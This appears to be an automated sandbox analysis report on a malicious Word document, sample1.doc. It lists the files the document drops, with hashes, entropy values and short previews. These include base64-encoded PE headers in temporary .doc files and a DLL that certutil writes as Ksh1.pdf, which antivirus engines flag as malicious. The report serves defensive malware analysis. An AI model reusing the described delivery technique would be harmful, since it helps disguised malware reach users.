                                                                              SHA-512:4318F2A585966FC03A86D566819F06F15A93BE1616231FC34E4C5B7F0B6317083654B7F9C446D250D91C25176853B8CEB42504419D35ECD7F8DEC4C6048B5D7D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview: T.V.q.Q.A.A.M.A.A.A.A.E.A.A.A.A././.8.A.A.L.g.A.A.A.A.A.A.A.A.A.Q.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.A.E.A.A.A.4.f.u.g.4.A.t.A.n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J.A.A.A.A.A.A.A.A.A.A.p.T.i.i.j.b.S.9.G.8.G.0.v.R.v.B.t.L.0.b.w.2.b.O.3.8.G.c.v.R.v.D.Z.s.7.X.w.G.i.9.G.8.N.m.z.t.P.B.1.L.0.b.w.P.0.d.D.8.U.0.v.R.v.A./.R.0.L.x.Y.i.9.G.8.D.9.H.R.f.F.+.L.0.b.w.Z.F.f.V.8.G.g.v.R.v.B.t.L.0.f.w.C.S.9.G.8.P.d.G.T./.F.s.L.0.b.w.9.0.Z.G.8.W.w.v.R.v.D.3.R.r.n.w.b.C.9.G.8.G.0.v.0.f.B.s.L.0.b.w.9.0.Z.E.8.W.w.v.R.v.B.S.a.W.N.o.b.S.9.G.8.A.A.A.A.A.A.A.A.A.A.A.U.E.U.A.A.E.w.B.B.Q.A.r.7.Z.h.f.A.A.A.A.A.A.A.A.A.A.D.g.A.A.I.h.C.w.E.O.E.A.A.U.A.Q.A.A.x.A.U.A.A.A.A.A.A.G.R.9.A.A.A.A.E.A.A.A.A.D.A.B.A.A.A.A.A.B.A.A.E.A.A.A.A.A.I.A.A.A.U.A.A.Q.A.A.A.A.A.A.B.Q.A.B.A.A.A.A.A.A.A.A.E.A.c.A.A.A.Q.A.A.A.A.A.A.A.A.D.A.E.A.B.A.A.A.Q.A.A.A.Q.A.A.A.A.A.B.A.A.A.B.A.A.
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0003.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):600580
                                                                              Entropy (8bit):5.850565167047853
                                                                              Encrypted:false
                                                                              SSDEEP:12288:nmkTbcqi+vjtKTA4rWgRRtgqDnygr6Yq/PWY:nmkvdbKDnyzx35
                                                                              MD5:1D35754EDB0B7AA76891735215FC048A
                                                                              SHA1:E0B1C34B3C39C1F097B7A3749174D098DC51E265
                                                                              SHA-256:C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348
                                                                              SHA-512:6851E23E0FBFF103D5BDCE5CDC4D425C070D8E72BA66525CD2F85255F5BF3921C434C371B1459F184468546670AC26FD307035572E12DF84D1172517E8202A07
                                                                              Malicious:false
                                                                              Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0005.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):598272
                                                                              Entropy (8bit):5.856822353998229
                                                                              Encrypted:false
                                                                              SSDEEP:12288:FmkwUHZaSyYGKFaaGXuG7ttehnyragYqyPhU:FmkVZm2hnyDxAC
                                                                              MD5:7E9AB23E4F7C98AF0A03B64E3C14D7F6
                                                                              SHA1:BAD0DC91FB2929FDBF66E569257BABA97E1EC233
                                                                              SHA-256:532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE
                                                                              SHA-512:014420FD9C97DBCFF01E11E385E392D8F9AB91D238A418E76C72CD1CD191D2BEE17E7442398C20BA229AD25B0461778F76A88039B1810E20E88A0FE58C434789
                                                                              Malicious:false
                                                                              Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD3150.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1191944
                                                                              Entropy (8bit):3.9253267830463896
                                                                              Encrypted:false
                                                                              SSDEEP:12288:ade8HF9kUxyxlFnsn4yA9W8MZ5axhVYGByJGZGy9e3rfTqtTfLlR1xwSaf67HNu4:me8HFmU/4yA9W89VYU7sY7yz1DsVirpI
                                                                              MD5:DA122309698B26E96848A6A829EEF5C1
                                                                              SHA1:DFA1B8C96C19827A595EEB15B2EC5386F9746CEF
                                                                              SHA-256:26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A
                                                                              SHA-512:4318F2A585966FC03A86D566819F06F15A93BE1616231FC34E4C5B7F0B6317083654B7F9C446D250D91C25176853B8CEB42504419D35ECD7F8DEC4C6048B5D7D
                                                                              Malicious:false
                                                                              Preview: T.V.q.Q.A.A.M.A.A.A.A.E.A.A.A.A././.8.A.A.L.g.A.A.A.A.A.A.A.A.A.Q.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.A.E.A.A.A.4.f.u.g.4.A.t.A.n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J.A.A.A.A.A.A.A.A.A.A.p.T.i.i.j.b.S.9.G.8.G.0.v.R.v.B.t.L.0.b.w.2.b.O.3.8.G.c.v.R.v.D.Z.s.7.X.w.G.i.9.G.8.N.m.z.t.P.B.1.L.0.b.w.P.0.d.D.8.U.0.v.R.v.A./.R.0.L.x.Y.i.9.G.8.D.9.H.R.f.F.+.L.0.b.w.Z.F.f.V.8.G.g.v.R.v.B.t.L.0.f.w.C.S.9.G.8.P.d.G.T./.F.s.L.0.b.w.9.0.Z.G.8.W.w.v.R.v.D.3.R.r.n.w.b.C.9.G.8.G.0.v.0.f.B.s.L.0.b.w.9.0.Z.E.8.W.w.v.R.v.B.S.a.W.N.o.b.S.9.G.8.A.A.A.A.A.A.A.A.A.A.A.U.E.U.A.A.E.w.B.B.Q.A.r.7.Z.h.f.A.A.A.A.A.A.A.A.A.A.D.g.A.A.I.h.C.w.E.O.E.A.A.U.A.Q.A.A.x.A.U.A.A.A.A.A.A.G.R.9.A.A.A.A.E.A.A.A.A.D.A.B.A.A.A.A.A.B.A.A.E.A.A.A.A.A.I.A.A.A.U.A.A.Q.A.A.A.A.A.A.B.Q.A.B.A.A.A.A.A.A.A.A.E.A.c.A.A.A.Q.A.A.A.A.A.A.A.A.D.A.E.A.B.A.A.A.Q.A.A.A.Q.A.A.A.A.A.B.A.A.A.B.A.A.
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD3271.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):600580
                                                                              Entropy (8bit):5.850565167047853
                                                                              Encrypted:false
                                                                              SSDEEP:12288:nmkTbcqi+vjtKTA4rWgRRtgqDnygr6Yq/PWY:nmkvdbKDnyzx35
                                                                              MD5:1D35754EDB0B7AA76891735215FC048A
                                                                              SHA1:E0B1C34B3C39C1F097B7A3749174D098DC51E265
                                                                              SHA-256:C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348
                                                                              SHA-512:6851E23E0FBFF103D5BDCE5CDC4D425C070D8E72BA66525CD2F85255F5BF3921C434C371B1459F184468546670AC26FD307035572E12DF84D1172517E8202A07
                                                                              Malicious:false
                                                                              Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65D8493-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1024
                                                                              Entropy (8bit):0.05390218305374581
                                                                              Encrypted:false
                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                              Malicious:false
                                                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E53D9D93-E64E-47DE-ADA9-74F7E4555893}.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1536
                                                                              Entropy (8bit):1.3586208805849453
                                                                              Encrypted:false
                                                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbm:IiiiiiiiiifdLloZQc8++lsJe1Mz7l
                                                                              MD5:42C4A2E83822AC1A97D0241765EC7FDF
                                                                              SHA1:8BF2A629CAB9574C6BB764B8C14AF057B706C22B
                                                                              SHA-256:A7D29AFD13A48F8AEC74071F0036ABED6084828D1CE349B970839C0DD01A057C
                                                                              SHA-512:65C5DB3915A0A2981283490AC0BD8BAD72BB6B72B17EFFA9D4DDDF99D185788D71AFDC8F305E2220017F1B22C0E14B118362B7A7C9CF01085DD82315E97C6480
                                                                              Malicious:false
                                                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Ksh1.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 14 10:26:51 2021, mtime=Thu Jan 14 10:26:51 2021, atime=Thu Jan 14 10:26:52 2021, length=595972, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):3660
                                                                              Entropy (8bit):4.4857927071772075
                                                                              Encrypted:false
                                                                              SSDEEP:96:8Nk/XiNyByK2Nk/XiNyByK2Tk/XmN1O2Tk/XmN12:8Nlu2Nlu2TR1pTR12
                                                                              MD5:D7ACD437731C16BD83076DEEB833BA10
                                                                              SHA1:413F199B1FD4209E4E5367269D4D7D13D8D0558C
                                                                              SHA-256:4D347D60D4FCBBE9387FA6936EC67B7DB910CB23F5680668FF2DF31142B67F11
                                                                              SHA-512:4BACECFB21365D1DA67D3D7CCD68B83688581B789D3AE2977E70DF20D0529AE3C04659C69227CC5DE25C98E5E06791F7A9A55A730314F2F2852A5C67B2970897
                                                                              Malicious:false
                                                                              Preview: L..................F.... ...1.'h...1.'h......(h...........................q....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1......R[[..Public..b.......:...R[[*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....V.2......R[[ .Ksh1.xls..>.......RZ[.RZ[*...,..... ...............K.s.h.1...x.l.s.......k...............-...8...[............?J......C:\Users\..#...................\\536720\Users.Public\Ksh1.xls.!.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.K.s.h.1...x.l.s..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9H.C...........[D_....3N...W...9H.C...........[....L..................F.... ...1.'h...1.'h......(h...........................q....P.O.
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Jul 14 02:20:08 2009, mtime=Thu Jan 14 10:26:51 2021, atime=Thu Jan 14 10:26:51 2021, length=4096, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):1604
                                                                              Entropy (8bit):4.4631175247586015
                                                                              Encrypted:false
                                                                              SSDEEP:24:8AE/XRleWjvB3qNL7Y2E6/XRleWjvB3qNL7c:8AE/Xj3ENfY2v/Xj3ENfc
                                                                              MD5:4B9860C35A90D10722034D003E0A189A
                                                                              SHA1:3222A3FF9689B7049C425F88DD3501D2EE37C1EE
                                                                              SHA-256:855954FD1B3B6FE1CFECB03F55FA32A581AC5DC81A3A3BE24DA2BC71AD190815
                                                                              SHA-512:3E45F886FAC52EA16828DBAEC6157069D153E652D42CB97CC32396F73B3ED4A912B7D1F26A36544C0D5BB0C543381B5A2AEB684E5B8E94A6B6C22B611E0840CA
                                                                              Malicious:false
                                                                              Preview: L..................F............1...1.'h...1.'h................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1......>.C..Public..b.......:...>.C*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......b...............-...8...[............?J......C:\Users\..#...................\\536720\Users.Public.......\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9G.C...........[D_....3N...W...9G.C...........[....L..................F............1.....)(h.....)(h................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):438
                                                                              Entropy (8bit):4.369509432724656
                                                                              Encrypted:false
                                                                              SSDEEP:6:M6dYrtg9CMdg9CMdg9UYrtg9CMUg9UYrhMUg9CMRMUg9s:M6IgEEgEEgJgEtg9tgEytgC
                                                                              MD5:9DDA3519F04FDEEB47B198EDD010E507
                                                                              SHA1:AC6C4075745C0F0064ADED9504934DDA44CB30E9
                                                                              SHA-256:A677F9380C0B0EB229D861D18FDDFFD4642FFCAF1ABF9007A77EC37F05F0BDBC
                                                                              SHA-512:8C0372F4659764915EC4D9EBA74F71E4464F1E5C56A0B31AF05638A747790B9AD2834642D94EB0512AEA1B5D8E292D9CB0029A849A0C91244376A50EC6501667
                                                                              Malicious:false
                                                                              Preview: [doc]..sample1.LNK=0..sample1.LNK=0..[doc]..sample1.LNK=0..Public.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Public.LNK=0..[doc]..sample1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[xls]..Ksh1.LNK=0..Public.LNK=0..[doc]..sample1.LNK=0..Ksh1.LNK=0..[xls]..Ksh1.LNK=0..Ksh1.LNK=0..[doc]..sample1.LNK=0..Ksh1.LNK=0..[xls]..Ksh1.LNK=0..
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample1.LNK
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 14 10:25:30 2021, mtime=Thu Jan 14 10:25:30 2021, atime=Thu Jan 14 10:25:32 2021, length=856064, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):1994
                                                                              Entropy (8bit):4.49236961742084
                                                                              Encrypted:false
                                                                              SSDEEP:48:8kmJ3l/XT+NXsylh3PDlONQh2kmJ3l/XT+NXsylh3PDlONQ/:8D3l/X6NANQh2D3l/X6NANQ/
                                                                              MD5:C972E4E94C522F3560E87CC410B03644
                                                                              SHA1:5F1D0A58174A254CC0712463002DA1B14721F881
                                                                              SHA-256:9AD5BC2C15F4258A2521A788FFEEDE0B8DD63B85A415CF5145FE35028F9BAF8B
                                                                              SHA-512:9C57A7577CCC29F0577E052440C46B77BF1A44651E9E48D8252B15DCE35694D4E73179FE194865E75DB4CCFC2F612F968E5266430F09A5BEA2FE49DAA3F8811D
                                                                              Malicious:false
                                                                              Preview: L..................F.... ....B..g....B..g...eQo.g................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R0[..Desktop.d......QK.X.R0[*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....^.2......R1[ .sample1.doc.D.......R0[.R0[*...?.....................s.a.m.p.l.e.1...d.o.c.......u...............-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop\sample1.doc.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.a.m.p.l.e.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..
                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.431160061181642
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                              Malicious:false
                                                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                              C:\Users\user\Desktop\~$ample1.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.431160061181642
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                              Malicious:false
                                                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                              C:\Users\Public\Ksh1.pdf
                                                                              Process:C:\Windows\System32\certutil.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):446976
                                                                              Entropy (8bit):7.675102075961339
                                                                              Encrypted:false
                                                                              SSDEEP:12288:NWSikkQXsGOCAStP1W+TXPc9JXvaWv7j3:ESiL5Sp1W+TYfHj
                                                                              MD5:706EA7F029E6BC4DBF845DB3366F9A0E
                                                                              SHA1:942443DFB8784066523DB761886115E08C99575F
                                                                              SHA-256:FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC
                                                                              SHA-512:036D5DE7E732302EF81989FBA62ABB1375119FC8141748D6548ED2310E95BDC07468ADA5CBF06C4F721B2B95CAF51E3267D4EF6DB2A2031CF5C8B2ABEE1C15A3
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Metadefender, Detection: 41%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 64%
                                                                              Joe Sandbox View:
                                                                              • Filename: task5.doc, Detection: malicious, Browse
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)N(.m/F.m/F.m/F....g/F...../F....u/F.?GC.M/F.?GB.b/F.?GE.~/F.dW..h/F.m/G../F..FO.l/F..FF.l/F..F..l/F.m/..l/F..FD.l/F.Richm/F.........PE..L...+._...........!................d}.......0............................................@.............................H...X...<.......PB..........................0|..8...........................h|..@............0..8............................text...g........................... ..`.rdata..d\...0...^..................@..@.data................v..............@....rsrc...PB.......D...~..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\Public\~$Ksh1.doc
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.431160061181642
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                              Malicious:false
                                                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                              C:\Users\Public\~$Ksh1.xls
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):162
                                                                              Entropy (8bit):2.431160061181642
                                                                              Encrypted:false
                                                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
